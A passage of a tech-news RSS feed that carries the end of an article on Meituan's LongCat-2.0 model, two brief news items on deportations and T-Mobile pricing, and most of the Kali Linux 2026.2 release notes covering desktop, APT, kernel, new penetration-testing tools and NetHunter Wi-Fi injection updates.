href="https://venturebeat.com/technology/openai-unveils-gpt-5-6-sol-terra-and-luna-models-but-only-accessible-to-limited-preview-partners-for-now-per-us-gov"> OpenAI was forced to limit access to its new GPT-5.6 models</a>, while Anthropic was previously also <a href="https://venturebeat.com/technology/anthropic-blocks-all-public-access-to-claude-fable-5-mythos-5-following-us-government-order-what-enterprises-should-do">ordered by the U.S. </a>to restrict access to its latest Claude Fable 5 / Mythos 5 models, which it took entirely offline in response. At the same time, a growing chorus of <a href="https://www.axios.com/2026/06/29/trump-ai-model-release-delays-tech-backlash">technologists</a>, <a href="https://thehill.com/policy/technology/5925364-ai-regulation-anthropic-trump-administration/">activists</a>, and industry experts warn that these defensive regulatory maneuvers have inadvertently backfired. By locking down Western closed-source models and driving up API costs, the U.S. government has left a wide operational window for global developers seeking affordable, high-performance alternatives like those found in Chinese open source models such as Meituan LongCat-2.0.</p><p>The raw operational metrics backed up the developer enthusiasm: during its unbranded residency on <a href="https://openrouter.ai/openrouter/owl-alpha">OpenRouter, Owl Alpha</a> accounted for approximately 10.1 trillion monthly tokens—averaging 559 billion tokens per day—representing a 242% month-over-month explosion in volume that propelled it into the platform's global top three.</p><p>By the time Meituan stepped forward to claim the architecture, the model had already secured the top ranking on the Hermes Agent workspace, second place on Claude Code deployments, and third place across international OpenClaw environments.</p><h2><b>Technology: Engineering the 1M-Token Sparse Context</b></h2><p>At the core of LongCat-2.0 lies an aggressive optimization of Mixture-of-Experts (MoE) sparsity, scaling total parameters to 1.6 trillion while limiting active computation to an average of 48 billion parameters per token.</p><p>Depending on the structural complexity of a query, the model’s dynamic activation ranges from 33 billion to 56 billion parameters. This design implements a "Zero-Compute Experts" framework, ensuring that routine execution elements pass through lighter subnetworks, entirely eliminating the idle computational overhead that typically penalizes ultra-dense models.</p><p>To sustain a functional 1-million-token context window without incurring catastrophic hardware bottlenecks, Meituan introduced LongCat Sparse Attention (LSA). Designed as an evolutionary iteration of DeepSeek Sparse Attention, LSA resolves the quadratic scoring costs and memory fragmentation that typically plague fine-grained sparse mechanisms through three distinct, orthogonal vectors:</p><ul><li><p><b>Streaming-aware Indexing (SI):</b> This system restructures the token selection pipeline by blending hardware-aligned contiguous data reads with dynamic random selection. By converting fragmented memory access into highly predictable, sequential blocks, the system achieves coalesced High Bandwidth Memory (HBM) utilization and elevated effective bandwidth.</p></li><li><p><b>Cross-Layer Indexing (CLI):</b> Leveraging the empirical reality that attention saliency remains highly stable across adjacent hidden layers, CLI amortizes calculation costs. A single indexing pass successfully guides multiple consecutive layers during inference, a capability reinforced by cross-layer distillation throughout the training phase.</p></li><li><p><b>Hierarchical Indexing (HI):</b> This approach applies a coarse-to-fine, two-stage scoring layout. The indexer performs a rapid, approximate block-level recall to filter candidates, before running fine-grained token selection exclusively on the remaining population.</p></li></ul><p>Furthermore, Meituan integrated an N-gram Embedding module inherited from its lighter model lines. By expanding parameter allocation in sparse dimensions completely orthogonal to the MoE expert layout, the architecture appends 135 billion parameters to a 5-gram token combination framework. </p><p>This expands the core embedding space by roughly 100-fold, allowing the model to capture dense local token relationships and accelerate large-batch inference operations by reducing memory Input/Output (I/O) bottlenecks.</p><h2><b>Product: Post-Training, MOPD Framework and Benchmark Performance</b></h2><p>While generalist large language models prioritize fluid, conversational interfaces, LongCat-2.0 focuses explicitly on multi-step engineering tasks, tool integration, and automated repository manipulation — agentic tasks, in other words. </p><p>In standardized assessments, LongCat-2.0 registers an empirical 59.5 on SWE-bench Pro, surpassing GPT-5.5's benchmark of 58.6. The model further establishes its agentic specialization by marking a 70.8 on Terminal-Bench 2.1, a 77.3 on SWE-bench Multilingual, and a 73.2 on the general corporate workflow simulator FORTE.</p><p>This precise operational behavior is achieved through a structural post-training layer called Multi-Teacher Optimization via Mixture of Specialized Experts (MOPD). Rather than blending raw human feedback into a singular reward function, the MOPD architecture segregates post-training optimization into three independent, highly focused expert clusters.</p><ul><li><p>The <b>Agent Experts</b> are fine-tuned strictly for structural execution, specializing in precise tool invocation, multi-turn API parameter parsing, and self-correcting loop mechanisms to avoid execution stagnation.</p></li><li><p>The <b>Reasoning Experts</b> are optimized in isolation to advance multi-hop logic, complex chain-of-thought engineering, mathematics, and high-level STEM problem-solving.</p></li><li><p>The <b>Interaction Experts</b> focus entirely on human alignment, instruction-following nuances, factual grounding to suppress hallucinations, and maintaining rigid safety guardrails without diminishing the model's overall utility.</p></li></ul><p>By segregating these vectors during post-training, LongCat-2.0 prevents functional degradation. A dynamic gate-routing mechanism then seamlessly fuses these specialized behaviors at runtime, allowing the final model to coordinate deep reasoning, stable tool execution, and safe user interaction simultaneously</p><p>While LongCat-2.0 generally trails premium frontier systems like Claude Opus 4.8 across broad general-agent benchmarks such as FORTE and BrowseComp, it explicitly punches above its weight in software engineering. </p><p>What makes this open-weight architecture special is its hyper-focus on autonomous development; it manages to narrowly exceed OpenAI's proprietary GPT-5.5 on the rigorous software engineering benchmark SWE-bench Pro (scoring 59.5 against 58.6), proving it is highly capable and fiercely competitive for complex coding tasks despite a leaner computational footprint.</p><h2><b>Commercial Framework: Pay-As-You-Go vs. Flash-Sale Token Packs</b></h2><p>Meituan's deployment strategy introduces a specialized commercial model that splits network access between conventional real-time API billing and structured "Token Packs". </p><p>For traditional enterprise integration, standard top-up accounts are available, deducting operational capital in real time based directly on token input and generation metrics.</p><p>However, to accommodate the unpredictable compute bursts characteristic of autonomous development agents, Meituan launched a structured Token Pack framework. Purchased as fixed, one-time volumetric allocations valid for a strict 30-day window, these packages stack directly on top of an organization's existing baseline API account. </p><p>To manage network load across its ASIC clusters, Meituan releases these high-volume packages via limited flash sales four times daily, precisely at 10:00, 16:00, 21:00, and 23:00 Beijing Time on a first-come, first-served basis.The economic standout of this framework is the zero-charge processing of context cache hits. </p><p>In massive agentic environments where a coding assistant must repeatedly read, reference, and modify the same multi-million-token code repository over an extended session, standard architectures penalize developers by charging full pricing for repeated input context. </p><p>Under Meituan's infrastructure, only cache-miss inputs and final token generations consume the package quota. This architecture completely alters the operational cost economics of large-scale agent software development, enabling deep iterative context exploration without compounding costs.</p><h2><b>Licensing: Open-Source Structural Freedom</b></h2><p>By registering the LongCat-2.0 repository under the open-source MIT License, Meituan positions the architecture with maximum legal flexibility for enterprise integration. </p><p>In contrast to copyleft paradigms like the GNU General Public License (GPL)—which legally obligates developers to open-source any derivative frameworks or internal software that links to the code—the MIT license permits near-unrestricted freedom.</p><p>For corporate engineering teams, this legal standard ensures that LongCat-2.0 can be deeply modified, compiled, and hard-coded directly into closed-source commercial applications, proprietary dev tools, and internal automation backends. </p><p>Corporations can fork the repository, optimize the internal LSA mechanisms for private databases, and sell the resulting software stack to end users without any obligation to disclose their proprietary intellectual property or structural enhancements.</p><h2><b>Meituan's Evolution: From Delivery Super App to AI Powerhouse</b></h2><p>Founded in March 2010 by serial entrepreneur <a href="https://www.howtheybegan.com/founders/wang-xing">Wang Xing</a>, Meituan initially launched as a Groupon-style daily deals website before rapidly evolving into one of China’s dominant “super apps”. </p><p>Following a massive 2015 merger with Dianping, the Beijing-based tech giant solidified a dominant market share over the country's urban delivery corridors, bridging local consumer reviews, instant retail, hotel bookings, and food delivery. Operating as a publicly traded powerhouse on the Hong Kong Stock Exchange, Meituan claims over 770 million annual transacting users and supports a network of more than 14.5 million merchants. </p><p>However, faced with intense domestic market competition, severe margin compression, and a sliding profit margin, the company aggressively pivoted its strategy beyond logistics. Meituan publicly committed to investing "billions" into artificial intelligence and domestic chip capabilities to revitalize its technology-driven offerings. </p><p>This strategic shift into the global AI race began materializing in late 2025 with the release of LongCat-Flash, a 560-billion-parameter Mixture-of-Experts foundation model, followed quickly by the advanced reasoning model LongCat-Flash-Thinking. By open-sourcing these frontier-class models under enterprise-friendly licenses, Meituan signaled its ambition to become a foundational player in global AI infrastructure rather than remaining strictly a regional e-commerce and delivery giant. </p><h2><b>Enterprise Implications: Autonomous Operational Workflows</b></h2><p>For modern enterprises, the release of LongCat-2.0 unlocks clear operational strategies across software engineering, system operations, and long-form data interpretation. </p><p>The combination of an open-weight, MIT-licensed model with an expansive 1-million-token context window means organizations can bypass the data privacy concerns and recurring overhead associated with hosting proprietary third-party APIs.In large-scale enterprise development environments, teams can leverage the model's specialized Agent Experts to orchestrate autonomous codebase migrations. </p><p>Instead of dedicating hundreds of developer hours to manually rewriting legacy application frameworks, engineers can pass an entire enterprise repository along with modern SDK documentation directly into the 1-million-token context window. LongCat-2.0 can map the dependencies, execute the repository-level structural updates, compile the new codebase, and catch compilation and execution bugs autonomously within local sandbox environments before generating a final pull request.</p><p>The model's architectural separation via the MOPD gate-routing mechanism yields significant advantages for strict enterprise compliance. By routing specific operational queries through isolated expert clusters, a financial institution or healthcare firm can deploy deep logic and mathematical reasoning passes without risking factual hallucination or violating strict safety bounds. </p><p>The Interaction Experts function as an implicit guardrail layer, suppressing errors and enforcing instruction-following protocols without degrading the raw processing power of the internal Reasoning Experts. Combined with the zero-cost caching model, enterprises can maintain hyper-focused autonomous software networks that can repeatedly inspect corporate data pools, continuously maintaining and optimizing internal infrastructure at a fraction of standard operational costs.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hundreds of Trump Forced Deportees Feared Dead]]></title>
<description><![CDATA[Trump used forced deportations to put hundreds of Venezuelans into a detention facility that collapsed into rubble. They are now missing and feared dead. A deportation flight from Miami arrived in Venezuela hours before Wednesday’s earthquakes. On board were 146 Venezuelans, including 19 women an...]]></description>
<link>https://tsecurity.de/de/3634817/it-security-nachrichten/hundreds-of-trump-forced-deportees-feared-dead/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634817/it-security-nachrichten/hundreds-of-trump-forced-deportees-feared-dead/</guid>
<pubDate>Tue, 30 Jun 2026 09:22:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Trump used forced deportations to put hundreds of Venezuelans into a detention facility that collapsed into rubble. They are now missing and feared dead. A deportation flight from Miami arrived in Venezuela hours before Wednesday’s earthquakes. On board were 146 Venezuelans, including 19 women and seven children, according to ICE Flight Monitor, an initiative of … <a href="https://www.flyingpenguin.com/hundreds-of-trump-forced-deportees-feared-dead/" class="more-link">Continue reading <span class="screen-reader-text">Hundreds of Trump Forced Deportees Feared Dead</span> <span class="meta-nav">→</span></a>]]></content:encoded>
</item>
<item>
<title><![CDATA[T-Mobile Forces Customers Off Their Plans and Increases Prices]]></title>
<description><![CDATA[T-Mobile notified long-time customers today that they were being forced off of their plans and onto plans that could increase prices by as much as $6 per line per month. As you can imagine, the news isn’t being taken positively. According to early reports, we’re seeing the majority of customers o...]]></description>
<link>https://tsecurity.de/de/3633529/it-nachrichten/t-mobile-forces-customers-off-their-plans-and-increases-prices/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633529/it-nachrichten/t-mobile-forces-customers-off-their-plans-and-increases-prices/</guid>
<pubDate>Mon, 29 Jun 2026 18:32:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>T-Mobile notified long-time customers today that they were being forced off of their plans and onto plans that could increase prices by as much as $6 per line per month. As you can imagine, the news isn’t being taken positively. According to early reports, we’re seeing the majority of customers on either Magenta or ONE...</p>
<p>Read the original post: <a href="https://www.droid-life.com/2026/06/29/t-mobile-forces-customers-off-their-plans-and-increases-prices/">T-Mobile Forces Customers Off Their Plans and Increases Prices</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kali Linux 2026.2 Release (GNOME 50, KDE 6.6, Helper Scripts, APT Formats & VM Boot Tweaking)]]></title>
<description><![CDATA[It’s the final week of Q2, and Kali Linux 2026.2 is here - right on schedule ;) We have been heads down since our last release, and we are ready to share what we have been working on. This release is a mix of desktop refreshes, infrastructure improvements, and quality-of-life changes that we thin...]]></description>
<link>https://tsecurity.de/de/3633508/tools/kali-linux-20262-release-gnome-50-kde-66-helper-scripts-apt-formats-vm-boot-tweaking/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633508/tools/kali-linux-20262-release-gnome-50-kde-66-helper-scripts-apt-formats-vm-boot-tweaking/</guid>
<pubDate>Mon, 29 Jun 2026 18:25:00 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>It’s the final week of Q2, and Kali Linux 2026.2 is here - right on schedule ;) We have been heads down since our last release, and we are ready to share what we have been working on. This release is a mix of desktop refreshes, infrastructure improvements, and quality-of-life changes that we think you will appreciate.</p>
<p>The summary of the <a href="https://bugs.kali.org/changelog_page.php">changelog</a> since the <a href="https://www.kali.org/blog/kali-linux-2026-1-release/">2026.1 release from March</a> is:</p>
<ul>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2026-2-release/#desktop-environments-updates">Desktop Environments</a></strong> - Bump to GNOME 50 and KDE Plasma 6.6</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2026-2-release/#improved-consistency-for-services-helper-scripts">Helper Scripts Consistency</a></strong> - Consistency to our little launches at starting services</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2026-2-release/#apt-gets-a-new-sources-format">APT Format</a></strong> - Goodbye <code>sources.list</code>, hello <code>sources.list.d/kali.source</code></li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2026-2-release/#no-more-graphics-firmware-pre-installed-for-vm-use-cases">VM Boot Optimisation</a></strong> - Smaller initrd + faster boot times = happy virtual machine users</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2026-2-release/#disruptive-package-updates">Reboot Warning</a></strong> - Heads-up, <code>polkit</code> and <code>xrdp</code> upgrades require a system reboot</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2026-2-release/#linux-kernel-for-this-release-619">Kali Kernel Incoming</a></strong> - Staying with 6.19 for now, how to get 7.0 early</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2026-2-release/#a-sneak-peek-build-scripts">Build Scripts Incoming</a></strong> - Heads-up with some changing on the way</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2026-2-release/#new-tools-in-kali">New Tools</a></strong> - As always, various new shiny packages have been added <em>(9!)</em></li>
</ul>
<hr>
<h2>Desktop Environments Updates</h2>
<p>As we do roughly every six months, every other Kali release, our <a href="https://www.kali.org/docs/general-use/switching-desktop-environments/">desktop environments</a> get a major update. This time it’s for: <a href="https://www.kali.org/blog/kali-linux-2026-2-release/#gnome-50">GNOME</a> and <a href="https://www.kali.org/blog/kali-linux-2026-2-release/#kde-plasma-6-6">KDE Plasma</a>. Neither brings sweeping changes, but both have put real effort into <strong>refining performance and usability</strong> across the whole ecosystem.</p>
<h3>GNOME 50</h3>
<p>GNOME 50 brings usability and performance improvements across the desktop. The <strong>file manager received significant optimizations</strong>, resulting in faster thumbnail and icon loading, improved responsiveness, and reduced memory usage. The desktop also received new accessibility enhancements through a brand-new preferences window, tweaks to the screen reader, and automatic language switching.</p>
<p>Another addition is <strong>support for document annotations</strong> in the Document Viewer app, making it easier to add text notes and highlights directly to documents.</p>
<p>Here you can read more about all the changes with this new GNOME release: <a href="https://release.gnome.org/50/">GNOME 50 release announcement</a>.</p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2026-2-release/images/gnome-50.png" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2026-2-release/images/gnome-50.png" alt="Kali + GNOME 50">
</a>
</p>

<h3>KDE Plasma 6.6</h3>
<p>KDE Plasma 6.6 focuses on improving usability and accessibility while introducing several new features, including a <strong>new on-screen keyboard</strong>, providing a better experience particularly for touch-enabled devices.</p>
<p>The <strong>Spectacle screenshot utility can now recognize and extract text</strong> directly from screenshots, making OCR functionality available from the desktop. Accessibility has also been enhanced with new color-vision support options, improvements to Zoom and Magnifier, support for Slow Keys on Wayland, and adoption of the standardized Reduced Motion setting.</p>
<p>Here you can read more about all the changes with this new Plasma release: <a href="https://kde.org/announcements/plasma/6/6.6.0/">KDE Plasma 6.6 release announcement</a>.</p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2026-2-release/images/kde-6.6.png" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2026-2-release/images/kde-6.6.png" alt="Kali + KDE Plasma 6.6">
</a>
</p>

<h2>Improved Consistency For Services Helper Scripts</h2>
<p>To improve consistency across tools that depend on a service, we have updated our helper scripts. Previously, a tool that required a service might only let you start it (with no way to stop) - and the information displayed back was inconsistent (mixture of service status, how to access, default credentials or nothing at all). With this change, multiple packages have been updated to use these new scripts, which now handle the following tasks:</p>
<ul>
<li>Manage the service - <strong>start/stop</strong></li>
<li><strong>Check if the service is already running</strong> - avoiding starting it twice</li>
<li>Show the <strong>service status</strong></li>
<li>Show any <strong><a href="https://www.kali.org/docs/introduction/default-credentials/">default credentials</a></strong></li>
<li>Show <strong>how to access it</strong> - such as if it’s a web UI, the URL <em>(and bonus, <strong>automatically open it in the browser</strong>!)</em></li>
</ul>
<p>We also make sure that any Kali packages which include a service use <strong><code>&lt;tool&gt;-start</code></strong>/<strong><code>&lt;tool&gt;-stop</code></strong> for their command names.</p>
<p><em>Hopefully this makes the little things a little easier.</em></p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2026-2-release/images/kali-services.png" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2026-2-release/images/kali-services.png" alt="Kali Services Helper Scripts">
</a>
</p>

<h2>APT Gets A New Sources Format</h2>
<p>Since the beginning of time, the APT sources for Kali Linux were configured in the file <code>/etc/apt/sources.list</code>. This file tells APT from where to update your system, and it’s so fundamental that pretty much everyone (that is, Kali users) knows this file and its content:</p>
<pre><code class="language-console">┌──(kali㉿kali)-[~]
└─$ cat /etc/apt/sources.list
# See https://www.kali.org/docs/general-use/kali-linux-sources-list-repositories/
deb http://http.kali.org/kali kali-rolling main contrib non-free non-free-firmware
</code></pre>
<p>Well, it’s a <strong>“once in a distro lifetime” kind of thing, and here it is</strong> - <code>/etc/apt/sources.list</code> is retired, in favor of the new file <code>/etc/apt/sources.list.d/kali.sources</code>:</p>
<pre><code class="language-console">┌──(kali㉿kali)-[~]
└─$ cat /etc/apt/sources.list.d/kali.sources
# See https://www.kali.org/docs/general-use/kali-apt-sources/
Types: deb
URIs: http://http.kali.org/kali/
Suites: kali-rolling
Components: main contrib non-free non-free-firmware
Signed-By: /usr/share/keyrings/kali-archive-keyring.gpg
</code></pre>
<p><strong>All the freshly-installed systems will be configured</strong> as such. <strong>Existing systems won’t be changed</strong>. Both files are equivalent and work just the same. However, in the near future, APT will warn if the old file is in use, and will suggest modernizing it.</p>
<p>Note that, for those in the know, this isn’t anything new: both formats have existed for a long time now, and you could use either one or the other. What’s happening is that the <em>default</em> is slowly changing, from the <strong>old “one-line-style”</strong> to the <strong>new “deb822-style”</strong>. This is happening in Debian and in Debian-derivatives like Ubuntu. Kali is just following suit.</p>
<p>And for the curious, there’s a very complete and detailed manual page:</p>
<pre><code class="language-console">┌──(kali㉿kali)-[~]
└─$ man sources.list
</code></pre>
<h2>No More Graphics Firmware Pre-installed For VM Use-cases</h2>
<p>Kali has had a long tradition of pre-installing a lot of firmware in its images. The upside is that users didn’t need to know what firmware they needed to install for their hardware to work: it was already there. And the downside, obviously, was that all the firmware that wasn’t needed was nevertheless installed and taking space for nothing. </p>
<p>It worked for us so far, in the sense that we don’t get too many bug reports related to missing firmware. But lately the changing landscape of <em>graphics firmware</em> forced us to re-evaluate this decision.</p>
<p>The issue with graphics firmware is that it just keeps growing bigger, and right now having it installed for <a href="https://www.kali.org/docs/general-use/install-nvidia-drivers-on-kali-linux/">NVidia</a>, AMD and Intel GPUs takes almost 300 MB. But what’s even worse: some bits and pieces of these firmware packages need to be loaded very early, and therefore they are also installed in the initrd (note: the initrd, or initramfs, is this “minimal” system that is loaded early on by the kernel at boot time). And lately, the Kali initrd peaked at around 200 MB, mainly due to graphics firmware. What does that mean in practice? A bigger initrd means slower boot time, and can potentially fill up your <code>/boot</code> partition if ever it’s too small.</p>
<p>So we thought we could improve the situation for VM users here: the vast majority probably don’t need graphics firmware, ever. The only use-case we can think of is a VM with a dedicated GPU + GPU passthrough enabled. If you’re in this case, you might need graphics firmware.</p>
<p>So, what changed in practice, you may ask?</p>
<ul>
<li><strong><a href="https://www.kali.org/get-kali/#kali-virtual-machines">Pre-built VM images</a> don’t come with graphics firmware anymore</strong></li>
<li><a href="https://www.kali.org/get-kali/#kali-installer-images"><strong>Installer images</strong></a> now detect if installation happens <strong>in a VM</strong>, and in that case <strong>graphics firmware is not installed</strong></li>
</ul>
<p>As a result, the <strong>initrd is down to 60 MB for VM users, and the boot time is cut by ~3x</strong> (tested for QEMU VM on a Linux host, your mileage may vary). That’s a massive improvement in boot time.</p>
<p>For baremetal users: nothing changed, so you still get a 200 MB initrd with all graphics firmware pre-installed. If you’d like to optimize, it’s on you to uninstall the firmware that you don’t need. A word of caution though: make sure to know what you’re doing, because removing graphics firmware that is <em>needed</em> might leave you with a <a href="https://www.kali.org/docs/troubleshooting/graphics-issues-on-bare-metal-installation/">system without graphics after reboot</a>.</p>
<h2>Disruptive Package Updates</h2>
<p>We’ve got some slightly disruptive updates in this release.</p>
<p><strong>polkit: a reboot is required</strong></p>
<p>The update of the <code>polkitd</code> package requires a reboot, otherwise <em>trying to start GUI applications as root will fail with cryptic error messages</em>.</p>
<p>There’s an indication of this <strong>reboot requirement</strong> in the output of <code>apt full-upgrade</code>, when the <code>polkitd</code> package is updated. It’s just <strong>not very obvious</strong>, the hint is buried with the rest of the logs:</p>
<pre><code class="language-console">┌──(kali㉿kali)-[~]
└─$ sudo apt update &amp;&amp; sudo apt full-upgrade
[...]
Setting up libpolkit-gobject-1-0:amd64 (127+really127-0kali1)…
Setting up libpolkit-agent-1-0:amd64 (127+really127-0kali1)…
Setting up polkitd (127+really127-0kali1)…
Upgrading to this polkitd version requires a reboot, please reboot the system when convenient.
Created symlink '/etc/systemd/system/sockets.target.wants/polkit-agent-helper.socket' → '/usr/lib/systemd/system/polkit-agent-helper.socket'.
[...]
</code></pre>
<p>After a reboot, and if ever you still can’t run applications as root, make sure that <code>polkit-agent-helper</code> is started:</p>
<pre><code class="language-console">┌──(kali㉿kali)-[~]
└─$ sudo systemctl enable --now polkit-agent-helper.socket
</code></pre>
<p>If you’re still having issues, reach out on our <a href="https://bugs.kali.org/">bug tracker</a>.</p>
<hr>
<p><strong>xrdp: a reboot is required</strong></p>
<p>In this Kali release, we updated <code>xrdp</code> and <code>xorgxrdp</code> to the <code>v0.10</code> series. <a href="https://www.kali.org/docs/general-use/xfce-with-rdp/">xrdp</a> is an open-source Remote Desktop Protocol server: you might use it if you connect to your Kali instance remotely. <em>If you’re an xrdp user, you’ll need to reboot after this upgrade</em>.</p>
<p>For those who run Kali in Hyper-V, using the <a href="https://www.kali.org/docs/virtualization/install-hyper-v-guest-enhanced-session-mode/">Enhanced Session Mode</a>: you’re an xrdp user, even if you didn’t know it! We did our best to ensure a smooth transition, and yet we got reports that xrdp wasn’t functional after the upgrade. If ever you’re in this case, you can try to run <code>kali-tweaks</code>, and in the Virtualization section you can try to <strong>disable, and then enable again</strong> the Hyper-V Enhanced Session Mode. That might fix the issue. <strong>Don’t forget to reboot</strong>!</p>
<p>As always, if you’re still having issues after that, feel free to reach out on the <a href="https://bugs.kali.org/">Kali bug tracker</a>.</p>
<h2>Linux Kernel For This Release: 6.19</h2>
<p>Regarding the version of the <a href="https://pkg.kali.org/pkg/linux">Linux kernel</a> to include in this release of Kali, it’s been a tough decision.</p>
<p>On one hand, we’d like to release with the latest version of the Linux kernel, due to all the recent vulnerability disclosures (<a href="https://en.wikipedia.org/wiki/Copy_Fail">Copy Fail/CVE-2026-31431</a>, <a href="https://github.com/V4bel/dirtyfrag">Dirty Frag/CVE-2026-43284 &amp; CVE-2026-43500</a> and others ). On the other hand, when the 7.0 kernel reached Debian, there were <a href="https://bugs.debian.org/1135362">reports of incompatibilities with the NVidia DKMS drivers</a> .</p>
<p>We decided to release with a 6.19 kernel to avoid breaking <a href="https://www.kali.org/docs/general-use/install-nvidia-drivers-on-kali-linux/">NVidia users</a>. At the same time, for <strong>those who prefer to get the latest kernel</strong> and don’t care about NVidia compatibility, <strong>we have the kernel 7.0 ready for you in <code>kali-experimental</code></strong>. Make sure to check our documentation that explains <a href="https://www.kali.org/docs/general-use/kali-apt-sources/#enabling-kali-additional-branches">how to enable the kali-experimental repository</a>. The 7.0 kernel is also available in kali-rolling, so you can just <a href="https://www.kali.org/docs/general-use/updating-kali/">update your whole system</a> and get the latest packages from <a href="https://www.kali.org/docs/general-use/kali-branches/">kali-rolling</a>.</p>
<h2>A Sneak Peek: Build Scripts</h2>
<p>Our <a href="https://gitlab.com/kalilinux/build-scripts/">build scripts</a> are what we use to produce every Kali image - ARM SBCs, Base (Installer and live ISOs), Cloud, Containers, VMs, WSL &amp; NetHunter/Pro. Each lives in its own repo, and over time they have each grown in slightly different directions. For the next release, Kali 2026.3, we are doing <strong>a consistency pass across all of them: same structure, same conventions, same behaviour throughout</strong>.</p>
<p>As a result of these changes, some CI pipelines or workflows may need tweaking.</p>
<h2>New Tools in Kali</h2>
<p>This release brings <strong>9 new tools</strong> <em>(to the network repositories)</em>. As always, we have been busy adding to the arsenal:</p>
<ul>
<li><a href="https://www.kali.org/tools/arsenal-ng/">arsenal-ng</a> - Go-based command library equipped with 200+ cybersecurity cheat-sheets</li>
<li><a href="https://www.kali.org/tools/hydra/">hydra-gtk</a> - [Re-added] Very fast network logon cracker - GTK+ based GUI</li>
<li><a href="https://www.kali.org/tools/legba/">legba</a> - Multiprotocol credentials bruteforcer / password sprayer and enumerator</li>
<li><a href="https://www.kali.org/tools/oletools/">oletools</a> - Analyze MS OLE2 files and MS Office documents</li>
<li><a href="https://www.kali.org/tools/penelope/">penelope</a> - Powerful shell handler</li>
<li><a href="https://www.kali.org/tools/shell-gpt/">shell-gpt</a> - Command-line productivity tool powered by AI large language models</li>
<li><a href="https://www.kali.org/tools/tailscale/">tailscale</a> - Secure connectivity platform</li>
<li><a href="https://www.kali.org/tools/tookie-osint/">tookie-osint</a> - OSINT information gathering tool for finding social media accounts</li>
<li><a href="https://www.kali.org/tools/uro/">uro</a> - Declutter URLs for crawling/pentesting</li>
</ul>
<p><em>There has also been numerous packages updates and new libraries as well. We also bump the <a href="https://www.kali.org/blog/kali-linux-2026-2-release/#linux-kernel-for-this-release-619">Kali kernel to 6.19</a>.</em></p>
<h2>Kali NetHunter Updates</h2>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2026-2-release/images/nethunter-eviltwin.jpg" target="_blank">
<img src="https://www.kali.org/blog/kali-linux-2026-2-release/images/nethunter-eviltwin.jpg" alt="Kali NetHunter EvilTwin">
</a>
</p>

<p>We have a tremendous amount of news for the lovers of mobile hacking! The <a href="https://store.nethunter.com/packages/com.offsec.nethunter/">Kali NetHunter app</a> <strong>launches instantly</strong> now, various <strong>bugs have been fixed</strong> with the <a href="https://www.kali.org/docs/nethunter/nethunter-custom-commands/">custom commands</a> and <a href="https://www.kali.org/docs/nethunter/nethunter-chroot-manager/">chroot manager</a> . A <strong>new EvilTwin</strong> (Wi-Fi Fake AP) tab has been added with password verification captive portal, <em>which brought along a really needed iptables fix</em>. So now after using <a href="https://www.kali.org/docs/nethunter/nethunter-wifipumpkin/">Wifipumpkin3</a> or EvilTwin, Android Hotspot will work properly. Huge thanks to the incredible work by <a href="https://gitlab.com/dr1408">@dr.rootsu</a>. The <a href="https://www.kali.org/docs/nethunter/nethunter-kernel/">kernel flasher tab</a> has also <strong>received a refresh</strong>.</p>
<p>However, this release’s spotlight is on the beginning of the <a href="https://www.kali.org/blog/kali-linux-2026-2-release/#the-qcacld30-injection-story">Qcacld-3.0 injection patch</a> wave.</p>
<h3>The Qcacld3.0 Injection Story</h3>
<p>We finally came to a milestone, shout-out to all the developers that worked on injection through the <em>years</em>!</p>
<p><a href="https://gitlab.com/kimocoder">@kimocoder</a> easily spent more than anyone else on this goal. His original injection implementation came to life, on a specific device: the OnePlus Nord (AC2003). You can find the commit <a href="https://github.com/kimocoder/android_kernel_oneplus_avicii/commit/8eb5de1047e7bf069cb4de38c3a35489b35df189">here</a>. Then <a href="https://gitlab.com/Loukious">@Loukious</a> came in the mix and his modifications made it to work on other devices with <a href="https://github.com/Loukious/android_kernel_xiaomi_sm8150/commit/18c57c61ecd8f02de778e36db6be9b41167a8825">this port</a>. Finally, <a href="https://gitlab.com/cyberknight777">@cyberknight777</a> did some housekeeping, removed unnecessary changes, logging, and restored the correct authorship while attributing @Loukious as co-author. The result, <a href="https://github.com/Neternels/android_kernel_xiaomi_sunny/commit/1a4a7d313acc75cfca9a5e97673745d721b6ccea">this patch</a> is the <strong>almost universal</strong> one which brought many devices into the injection world, starting with the ones below for both kernel 4.x and 5.x versions:</p>
<ul>
<li><a href="https://www.kali.org/docs/nethunter/installing-nethunter-on-the-oneplus-7/">OnePlus 7</a> (LineageOS 23.2)</li>
<li>OnePlus 9 / 9 Pro</li>
<li>OnePlus Nord</li>
<li>POCO X3 Pro</li>
<li>Redmi Note 10</li>
<li>Samsung A73</li>
<li><a href="https://www.kali.org/docs/nethunter/installing-nethunter-on-the-xiaomi-mi-a3/">Xiaomi Mi A3</a> (LineageOS 23.2)</li>
<li>Xiaomi Poco X3 NFC (PixelOS Android 16)</li>
<li>Xiaomi Redmi Note 8</li>
</ul>
<h3>Wifite On TV</h3>
<p></p><p>
<a href="https://www.kali.org/blog/kali-linux-2026-2-release/images/nethunter-wifite2-netflix-bloodhounds-s02e01.jpg" target="_blank">
